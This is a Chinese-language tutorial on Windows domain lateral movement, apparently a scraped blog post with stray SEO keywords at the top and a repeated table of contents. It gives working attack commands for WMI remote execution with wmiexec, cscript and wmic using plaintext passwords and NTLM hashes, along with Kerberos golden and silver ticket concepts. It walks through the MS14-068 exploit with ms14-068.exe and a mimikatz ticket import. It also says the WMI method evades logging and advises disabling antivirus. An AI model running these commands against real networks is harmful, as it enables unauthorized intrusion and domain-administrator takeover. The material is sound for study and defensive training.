网站功能怎么写,腾讯企业邮箱扫码登录入口,重庆建设工程造价管理协会网站,网站费用预算目录
wmi协议远程执行
ptt票据传递使用
命令传递方式
明文口令传递
hash口令传递
票据分类
kerberos认证的简述流程
PTT攻击的过程
MS14-068 漏洞
执行过程 wmi协议远程执行
wmi服务是比smb服务高级一些的#xff0c;在日志中是找不到痕迹的#xff0c;但是这个主…目录
wmi协议远程执行
ptt票据传递使用
命令传递方式
明文口令传递
hash口令传递
票据分类
kerberos认证的简述流程
PTT攻击的过程
MS14-068 漏洞
执行过程 wmi协议远程执行
wmi服务是比smb服务高级一些的在日志中是找不到痕迹的但是这个主要是传递的管理员用户凭据.域横向移动WMI服务利用 cscript、wmiexec、wmic.WMI(Windows Management Instrumentation)是通过135端口进行利用支持用户名明文或者hash的方式进行认证并且该方法不会在目标日志系统留下痕迹. netstat -ano -p tcp 遇到这两个端口大概率就是windows系统哟域内主机执行以下命令 查看域控主机的相关信息类容 wmiexec 套件impacket wmiexec明文或hash传递有回显exe版本可能被杀.wmiexec.exe XIE0/administrator:123qq.com192.168.1.89 whoamiwmiexec.exe 都是一些python文件 只是生成了一些exe文件这个可以再github上查看pyton源码以及可执行文件. 域hash传递命令wmiexec.exe -hashes :3a3b8e860125a8a182550fe86e7f923f XIE0/administrator192.168.1.89 whoamicscript 有回显 自带cscript明文传递有回显需要下载wmiexec.vbs配合,上传到对应域内磁盘文件夹下. cscript //nologo wmiexec.vbs /shell 192.168.1.89 administrator 123qq.com 来到域内主机执行完成后 窗口连接就指向了 域控主机了,但是如果域主机上有杀毒软件,那么就要退出杀毒,再执行. wmic 无回显 wmic /node:192.168.1.89 /user:administrator /password:123qq.com process call create cmd.exe /c ipconfig C:\1.txt再到域控主机上查看 c盘
ptt票据传递使用 命令传递方式 明文口令传递 hash口令传递 票据分类 票据口令传递-[ptt pass the ticker] 金票{黄金票据} 银票{白银票据}
涉及到kerberos认证流程 参考 文章哟 !域渗透协议 详解之 : Kerberos 看看就明白是什么玩意了-CSDN博客 kerberos认证的简述流程 客户端需要向kdc授予票据 kdc: 秘钥分发中心 也就是可以理解成售票处 黄金票据相当于伪造了一个售票处拿着授予的票据去访问服务端的服务 伪造了需要访问的服务
PTT攻击的过程
MS14-068 漏洞
执行过程
github地址有兴趣可以自行研究一下:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068漏洞的原理使用的SID的方式进行的这个漏洞是域提权漏洞原理就和黄金票据相似通过生成黄金票据导入工具中将一个普通权限的域用户获取域管的使用权限从而达到控制整个域。
运用过程:
该补丁没有打猜测存在MS14-068漏洞收集域信息 net time #获取域管账号net config workstation #获取域信息nltest /dsgetdc:moonsec #获取域管信息
执行命令
ms14-068.exe -u 域成员名域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址查询sid whoami /user上传攻击工具 攻击命令 ms14-068.exe -u hackxie.com -p 123qq.com -s S-1-5-21-557645019-1356755253-2509318976-500 -d 192.168.1.89开始执行在win7域内主机上执行完成后会创建一张TGT的预售票 然后查看这张票下面有那些票。klist 查看票klist purge 清除票 也可以使用 mimikatz.exe 相关命令来处理 上传mimikatz.exe执行以下命令kerberos::purge #清空票据kerberos::ptc 123.ccache #导入票据 mimikatz.exe kerberos::ptc 123.ccache exit在域内主机中 查看域控主机c盘的内容执行net time 获取域控主机名称 AD 查看域控主机c盘中含有什么类容 dir \\AD.xie.com\c$kerberos::list #查看票据